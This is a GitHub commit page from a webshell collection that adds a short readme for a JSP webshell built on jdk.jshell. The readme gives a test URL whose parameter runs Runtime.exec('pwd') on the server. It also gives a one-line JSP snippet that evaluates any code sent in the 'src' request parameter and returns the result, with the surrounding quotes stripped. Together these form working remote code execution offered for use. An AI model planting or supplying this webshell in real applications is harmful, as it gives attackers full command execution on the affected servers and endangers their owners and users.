1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 04:41:28 +00:00

Create jshell.md

This commit is contained in:
tennc
2019-10-08 14:47:41 +08:00
committed by GitHub
parent 294061690e
commit e46fdc2bd8

9
jsp/p2j.cn/jshell.md Normal file
View File

@@ -0,0 +1,9 @@
readme
![](http://p2j.cn/uploads/image/20190910/20190910185302_297.png)
测试用例http://localhost:8080/modules/jshell.jsp?src=new%20java.io.BufferedReader(new%20java.io.InputStreamReader(Runtime.getRuntime().exec(%22pwd%22).getInputStream())).readLine()
如果强迫症想撸掉多余的输出:
<%=jdk.jshell.JShell.builder().build().eval(request.getParameter("src")).get(0).value().replaceAll("^\"", "").replaceAll("\"$", "")%>